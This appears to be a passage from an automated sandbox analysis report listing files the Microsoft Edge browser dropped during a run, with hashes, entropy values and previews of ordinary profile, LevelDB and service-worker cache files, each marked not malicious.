                                                                                                                                                                                                                                                                                          Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380134357125805","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380134357125805","location":5,"ma

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF47d6a.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):28366
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.556999534773399
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:EIr4/27pLGLhloWPqIftA8F1+UoAYDCx9Tuqh0VfUC9xbog/OVWHtzHrw9pCtuW:EIr4/WchloWPqIftAu1janNzUWtR
                                                                                                                                                                                                                                                                                          MD5:62BA76A3BB5746514FE95F11510A4E40
                                                                                                                                                                                                                                                                                          SHA1:AE4291A10A01FF9E26AE77558E3E4109399205FE
                                                                                                                                                                                                                                                                                          SHA-256:5E4430F24C2BDA78DDCCB61CF82FFEDAAE60B2B93EC05B69A8F75CE82A7DB541
                                                                                                                                                                                                                                                                                          SHA-512:9A7DF3773A947C01B67A2DF040AF7214FA310B9B3E5E7753E44B60A084B08ADBC3EC003B56D38BBEC02143F714BE80110576167CA07B792EEFFB1089B3DDA946
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380134357125805","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380134357125805","location":5,"ma

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2394
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.813577395037343
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:F2em3Mrd6GMfBCrdod+kxrd6GPBhrdQPBR:F1m3Mx6Fcxookxx6Wx2
                                                                                                                                                                                                                                                                                          MD5:03DC1AD7D31A02689BD10885E06BF1FC
                                                                                                                                                                                                                                                                                          SHA1:063224F85C5C7E58FE3905E9C721A31E9531DB50
                                                                                                                                                                                                                                                                                          SHA-256:C70698FCE773A47410D5613D28A4BCE4BD3538FC6D4EAD3B2A824BC94C3264AF
                                                                                                                                                                                                                                                                                          SHA-512:BB78E8DF5B17CB74289B67CD39C446C02D8F862E70E118E1E6E3F4BE685F95DECF63667374367CFD89EDDD192B4862352ADEEEF82392998A520475DC594F4588
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2`).t.................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.+INITDATA_UNIQUE_ORIGIN:https://ntp.msn.com/...REG:https://ntp.msn.com/.0......https://ntp.msn.com/edge/ntp...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true .(.0.8........@...Z.b.....trueh..h..h..h..h..h..h..h..h..h..h.!p.x..................................REGID_TO_ORIGIN:0.https://ntp.msn.com/..RES:0.0.......https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmpt

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):297
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.191340106407271
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5CHeB1923oH+TcwtE/a252KLlrCHaM+q2P923oH+TcwtE/a2ZIFUv:TMYeb8xLtM+v4Yeb8J2FUv
                                                                                                                                                                                                                                                                                          MD5:6CA59578F47B25083EF571612CE8D7D1
                                                                                                                                                                                                                                                                                          SHA1:628558FD360146348FBF15AE67F2C3C49F9C1176
                                                                                                                                                                                                                                                                                          SHA-256:995743C6BE2A658709B619C3245C08FE6A4B7718D09190CC9FCB56789F85E59B
                                                                                                                                                                                                                                                                                          SHA-512:FD5743ED125BA2F6D3F896DB322B9A17881E07FDD6C178665C910D36100BFAF4D76A6C9E8B410F8F60550483E0B09586223A9A40939B41CC2C71FF594E54BE61
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/31-10:59:26.734 dfc Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/12/31-10:59:26.753 dfc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):41
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                          MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                          SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                          SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                          SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):114575
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.579313812495444
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:kU906yxPXfOxr1lhCe1nL/ImL/rBZXECjPXNtsf387ekshKL2:J9LyxPXfOxr1lMe1nL/5L/TXE6n7de
                                                                                                                                                                                                                                                                                          MD5:CD9A98B0E55790B5939601C4ECC214D2
                                                                                                                                                                                                                                                                                          SHA1:778908619913A29560871573058DA87A8D5096FF
                                                                                                                                                                                                                                                                                          SHA-256:7B6AC919F9A4FFCEB7DA5501E9372A44E8519BD6FFE5D497C1EF97413E55608A
                                                                                                                                                                                                                                                                                          SHA-512:9B9D1D02137D3F11927A56D2FC46E40C4E3546385632946465EE6A596FE157ED2E1E2C63289DEC1860BB1B32EA4B5F11F8FCB4A342E1FB7125617DBF50D96F35
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):189105
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.386232795358879
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:NZrCXkzhrwBw3pVUm14TL/8qGTUnNvvJkvkn3yQj2LUsfL+:PEBw3AmSL/ZGodJHlAV+
                                                                                                                                                                                                                                                                                          MD5:F66FE62B76AB4CE43B2DF8B7E8CE6805
                                                                                                                                                                                                                                                                                          SHA1:1946B2E0AD901E0F29215D0EA43177D8CC361867
                                                                                                                                                                                                                                                                                          SHA-256:B639A4554203BC099A389CC3CA70D8CC8768F48DEC8EC47AC7D7A3C2F3A8895B
                                                                                                                                                                                                                                                                                          SHA-512:A2F16FB7A47C8AA070C9AFF56B02D63E66172BF45FC29A1E6416A6DA8748BB175C35DD21D5D40C37ECAD96DB3240BADE417FE1246EE05BF0A5E969FCB711D53D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:0\r..m..........rSG.....0....z3.................;.....x.X........,T.8..`,.....L`.....,T...`......L`......Rc........exports...Rc.......module....Rc...*....define....Rb:.%.....amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H........Q...~.?A{...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true.a........Db............D`.....E..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da....@[...,T.`.`z.....L`..........a............a.........Dr8..............

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):24
                                                                                                                                                                                                                                                                                          Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                                          MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                                          SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                                          SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                                                          SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:0\r..m..................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):72
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.565412423760729
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:lmvcyyXl/lYV/lxE4ltQxp:8vPKYWoWz
                                                                                                                                                                                                                                                                                          MD5:A81992FE62624B1D5BD2C0956EE843CA
                                                                                                                                                                                                                                                                                          SHA1:A4EE51AB3AD3CE4CEE4AE6AF136D47DF952D97AA
                                                                                                                                                                                                                                                                                          SHA-256:4850900E284801AAF1296E39F1C6512B355A92C83F8604B2145803184F596171
                                                                                                                                                                                                                                                                                          SHA-512:4868836CBA5DD4DC32255D8A19C16313FB1E123EEE9DACC9B5A6B73C70E8D6DAC3D817CB82017547E6BC33A33F9572B7A96ADFCD4834C610DA97C0AD5D3F67CD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:@......1oy retne.........................X....,................f..L)./.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):72
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.565412423760729
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:lmvcyyXl/lYV/lxE4ltQxp:8vPKYWoWz
                                                                                                                                                                                                                                                                                          MD5:A81992FE62624B1D5BD2C0956EE843CA
                                                                                                                                                                                                                                                                                          SHA1:A4EE51AB3AD3CE4CEE4AE6AF136D47DF952D97AA
                                                                                                                                                                                                                                                                                          SHA-256:4850900E284801AAF1296E39F1C6512B355A92C83F8604B2145803184F596171
                                                                                                                                                                                                                                                                                          SHA-512:4868836CBA5DD4DC32255D8A19C16313FB1E123EEE9DACC9B5A6B73C70E8D6DAC3D817CB82017547E6BC33A33F9572B7A96ADFCD4834C610DA97C0AD5D3F67CD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:@......1oy retne.........................X....,................f..L)./.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF49f98.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):72
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.565412423760729
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:lmvcyyXl/lYV/lxE4ltQxp:8vPKYWoWz
                                                                                                                                                                                                                                                                                          MD5:A81992FE62624B1D5BD2C0956EE843CA
                                                                                                                                                                                                                                                                                          SHA1:A4EE51AB3AD3CE4CEE4AE6AF136D47DF952D97AA
                                                                                                                                                                                                                                                                                          SHA-256:4850900E284801AAF1296E39F1C6512B355A92C83F8604B2145803184F596171
                                                                                                                                                                                                                                                                                          SHA-512:4868836CBA5DD4DC32255D8A19C16313FB1E123EEE9DACC9B5A6B73C70E8D6DAC3D817CB82017547E6BC33A33F9572B7A96ADFCD4834C610DA97C0AD5D3F67CD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:@......1oy retne.........................X....,................f..L)./.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):5249
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.417145414061563
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:pu9hDEbqf2mgJ6GL9Xp+B+XiVC1Ll9iSr/1hhjgQQS+fh:cEGPgJZ9Xp+BgisLl9iSr/Thj2l
                                                                                                                                                                                                                                                                                          MD5:DF796E88A421DD7A47C8A560C2598C38
                                                                                                                                                                                                                                                                                          SHA1:4AF80157EBB7AC0D28E1635CEA70CDD39D565573
                                                                                                                                                                                                                                                                                          SHA-256:5E75FC5FAE04993F5E8E2CFD44856421C7BB5A39CD780173C9763BB96F89558A
                                                                                                                                                                                                                                                                                          SHA-512:0E1492A46CECED5637300F7AF7A1DB769E10BD6248DEBD481AC0203D6FE35962AB676524FFCA455A91B83844B4B17681E68F102344CBA99417005BA0DBCFE272
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f...............s$..b................next-map-id.1.Cnamespace-620ffd09_4a33_4e77_8cb7_e0ea7bc70168-https://ntp.msn.com/.0..v.<................map-0-shd_sweeper.&{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.r.g.-.e.s.h.b.t.n.t.r.t.f.a.c.-.c.,.p.n.p.w.x.e.x.p.i.r.e.-.c.,.p.r.g.-.c.g.-.c.r.o.s.a.l.o.c.1.,.r.o.u.t.e.a.u.t.h.e.x.p.,.r.o.u.t.e.s.p.o.r.t.s.e.x.p.,.p.r.g.-.a.d.s.p.e.e.k.,.p.r.g.-.p.r.2.-.w.i.d.g.e.t.-.t.a.b.,.1.s.-.f.c.r.y.p.t.,.p.r.g.-.i.l.f.r.e.-.c.l.i.c.k.,.1.s.-.p.r.2.-.f.f.o.,.1.s.-.w.p.o.-.p.r.g.2.-.2.c.f.r.e.h.,.1.s.-.w.p.o.-.p.r.g.2.-.u.i.t.a.p.1.,.p.r.g.-.p.r.2.-.f.r.e.2.c.,.p.r.g.-.p.r.2.-.f.r.e.c.l.i.c.k.,.1.s.-.n.t.f.2.-.e.v.l.c.f.c.,.1.s.-.n.t.f.2.-.b.k.n.l.c.,.1.s.-.n.t.f.2.-.i.p.t.l.c.,.1.s.-.p.r.2.-.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):321
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.197103895621012
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5MXsR+q2P923oH+TcwtrQMxIFUt8MMRiHZZmw+MMdsRVkwO923oH+TcwtrQMFLJ:Iv4YebCFUt8niHZ/+rC5LYebtJ
                                                                                                                                                                                                                                                                                          MD5:CCC39481572EDEE3CA18027046C82894
                                                                                                                                                                                                                                                                                          SHA1:EAC7E0A1383FE80CE655ACC166D8EC69F8E986F2
                                                                                                                                                                                                                                                                                          SHA-256:0D469E5CBDA2FBDF30BA814EE8F91C29CE6BC3E23730CACA691CF3D6398B8E5C
                                                                                                                                                                                                                                                                                          SHA-512:2B4780DF05AFCCE09F1ABAA7C61F61F848F7C7135C2599585446BBA443F2EEF29DC1832F798C5187F5B73FCD64FB07BCC51EA068F00871B0028AEA628D4CF564
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/31-10:59:17.862 3f8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/31-10:59:17.864 3f8 Recovering log #3.2024/12/31-10:59:17.868 3f8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):321
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.197103895621012
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5MXsR+q2P923oH+TcwtrQMxIFUt8MMRiHZZmw+MMdsRVkwO923oH+TcwtrQMFLJ:Iv4YebCFUt8niHZ/+rC5LYebtJ
                                                                                                                                                                                                                                                                                          MD5:CCC39481572EDEE3CA18027046C82894
                                                                                                                                                                                                                                                                                          SHA1:EAC7E0A1383FE80CE655ACC166D8EC69F8E986F2
                                                                                                                                                                                                                                                                                          SHA-256:0D469E5CBDA2FBDF30BA814EE8F91C29CE6BC3E23730CACA691CF3D6398B8E5C
                                                                                                                                                                                                                                                                                          SHA-512:2B4780DF05AFCCE09F1ABAA7C61F61F848F7C7135C2599585446BBA443F2EEF29DC1832F798C5187F5B73FCD64FB07BCC51EA068F00871B0028AEA628D4CF564
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/31-10:59:17.862 3f8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/31-10:59:17.864 3f8 Recovering log #3.2024/12/31-10:59:17.868 3f8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13380134359610106

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1443
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.8214163094591322
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:3oYKFayedkpsAF4unx1rktLp3X2amEtG1ChqlzWOLsFQKkOAM4tM7:3oYKFa2zFILp2FEkChUzhLs2HOp+M7
                                                                                                                                                                                                                                                                                          MD5:20CC26F96B3A6C8B0531B16F9CD18B6E
                                                                                                                                                                                                                                                                                          SHA1:91AE2966506F971280F372C6BB11209520A90098
                                                                                                                                                                                                                                                                                          SHA-256:EEE57411B15E590EC2C7171513E0E4DC201DE4574A0F204B277439BED65C13EB
                                                                                                                                                                                                                                                                                          SHA-512:7C707AC4B494F90E8885A7682943A547C6014003FBC0D66888159968BC4865152133B19E76923CEE38D24C3DE44E4EC62E093D91689623D714AF6716820BD046
                                                                                                                                                                                                                                                                                          Malicious:false
